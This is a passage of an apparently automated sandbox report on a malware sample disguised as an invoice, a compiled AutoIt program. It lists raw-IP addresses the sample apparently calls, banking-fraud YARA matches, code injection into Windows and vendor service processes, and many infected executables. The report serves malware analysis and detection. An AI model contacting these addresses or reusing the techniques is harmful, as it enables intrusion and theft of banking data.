MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.0 (Ubuntu) | Date: Thu, 28 Nov 2024 11:13:53 GMT | Content-Type: text/html | Content-Length: 580 | Connection: keep-alive | Data Raw and Data Ascii: byte-for-byte identical to the 11:13:52 response above (stock nginx 404 page with six padding comments)
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.0 (Ubuntu) | Date: Thu, 28 Nov 2024 11:14:11 GMT | Content-Type: text/html | Content-Length: 580 | Connection: keep-alive | Data Raw and Data Ascii: byte-for-byte identical to the 11:13:52 response above
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.0 (Ubuntu) | Date: Thu, 28 Nov 2024 11:14:12 GMT | Content-Type: text/html | Content-Length: 580 | Connection: keep-alive | Data Raw and Data Ascii: byte-for-byte identical to the 11:13:52 response above
      Source: armsvc.exe, 00000002.00000002.620027406.000000000063C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000002.620027406.0000000000655000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://13.251.16.150/nqtlxhjrub
      Source: invoice_96.73.exe, 00000000.00000002.356954240.0000000000B54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/bpewylwxymwihal
      Source: invoice_96.73.exe, 00000000.00000002.356954240.0000000000B54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/bpewylwxymwihal:
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0H
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0I
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://s.symcb.com/universal-root.crl0
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://s.symcd.com06
      Source: armsvc.exe, 00000002.00000003.418303558.00000000020C0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: armsvc.exe, 00000002.00000003.418303558.00000000020C0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
      Source: Aut2exe_x64.exe.2.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/
      Source: armsvc.exe, 00000002.00000003.586384130.0000000001570000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.580781457.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Aut2exe_x64.exe.2.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/8
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
      Source: RdrServicesUpdater.exe.2.dr | String found in binary or memory: http://www.winimage.com/zLibDll
      Source: armsvc.exe, 00000002.00000003.535352318.00000000015A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://clients2.google.com/service/update2/crxupdate_urlHKEY_LOCAL_MACHINE
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://d.symcb.com/cps0%
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://d.symcb.com/rpa0.
      Source: armsvc.exe, 00000002.00000003.597459044.0000000001570000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.autoitscript.com/site/autoit/8
      Source: armsvc.exe, 00000002.00000003.517070722.0000000001490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.digicert.com/CPS0

      E-Banking Fraud

      Source: Yara match | File source: 00000004.00000002.387515587.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000004.00000002.387578097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      Source: invoice_96.73.exe, 00000000.00000000.345947431.00000000004AE000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_484a09d7-f
      Source: invoice_96.73.exe, 00000000.00000000.345947431.00000000004AE000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_f0639c96-e
      Source: invoice_96.73.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_70dc9359-2
      Source: invoice_96.73.exe | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_d3d9a115-a
      Source: initial sample | Static PE information: Filename: invoice_96.73.exe
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Memory allocated: 770B0000 page execute and read and write
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Memory allocated: 770B0000 page execute and read and write
      Source: C:\Windows\SysWOW64\svchost.exe | Memory allocated: 770B0000 page execute and read and write
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Memory allocated: 770B0000 page execute and read and write
      Source: C:\Windows\SysWOW64\perfhost.exe | Memory allocated: 770B0000 page execute and read and write
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\23f9eaead4df6ab2.bin
      Source: C:\Windows\System32\msdtc.exe | File created: C:\Windows\DtcInstall.log
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Load Driver
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Security
      Source: ehrecvr.exe.2.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: CCleaner.exe.2.dr | Static PE information: Resource name: BRANDING type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Source: CCleaner64.exe.2.dr | Static PE information: Resource name: BRANDING type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Source: RdrServicesUpdater.exe.2.dr | Static PE information: Resource name: ZIP type: Zip archive data, at least v2.0 to extract, compression method=deflate
      Source: elevation_service.exe.2.dr | Static PE information: Number of sections : 12 > 10
      Source: RdrCEF.exe.2.dr | Static PE information: Resource name: CDRC type: RIFF (little-endian) data, Web/P image, VP8 encoding, 800x600, Scaling: [none]x[none], YUV color, decoders should clamp
      Source: SciTE.exe.2.dr | Static PE information: Data appended to the last section found
      Source: invoice_96.73.exe, 00000000.00000003.350225262.00000000042FD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs invoice_96.73.exe
      Source: invoice_96.73.exe, 00000000.00000003.350507609.0000000004480000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs invoice_96.73.exe
      Source: invoice_96.73.exe, 00000000.00000003.346472098.0000000002A90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamearmsvc.exeN vs invoice_96.73.exe
      Source: invoice_96.73.exe, 00000000.00000003.349931866.0000000003690000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameALG.exej% vs invoice_96.73.exe
      Source: invoice_96.73.exe, 00000000.00000003.353710582.00000000037C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameaspnet_state.exeT vs invoice_96.73.exe
      Source: invoice_96.73.exe, 00000000.00000003.351198685.00000000042FD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs invoice_96.73.exe
      Source: invoice_96.73.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
      Source: invoice_96.73.exe | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: armsvc.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: FlashPlayerUpdateService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: aspnet_state.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AcroRd32Info.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AcroTextExtractor.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ADelRCP.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AdobeCollabSync.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: arh.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: WCChromeNativeMessagingHost.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: Eula.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: FullTrustNotifier.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: LogTransport2.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: 32BitMAPIBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: mscorsvw.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: mscorsvw.exe1.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: dllhost.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ehrecvr.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ehsched.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: FXSSVC.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: elevation_service.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ieetwcollector.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: maintenanceservice.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: msdtc.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: msiexec.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: perfhost.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: Locator.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: snmptrap.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: sppsvc.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: vds.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: VSSVC.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: wbengine.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: WmiApSrv.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: wmpnetwk.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: SearchIndexer.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ose.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: setup.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: dwtrig20.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: CCleaner.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: CCleaner64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: jabswitch.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: java-rmi.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: java.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: javacpl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: javaw.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: javaws.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: jjs.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: jp2launcher.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: keytool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: kinit.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: klist.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ktab.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: orbd.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: pack200.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: policytool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: rmid.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: rmiregistry.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: servertool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ssvagent.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: tnameserv.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: unpack200.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AcroBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: RdrCEF.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: 64BitMAPIBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: reader_sl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: wow_helper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: Au3Info.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: Au3Info_x64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AutoIt3Help.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
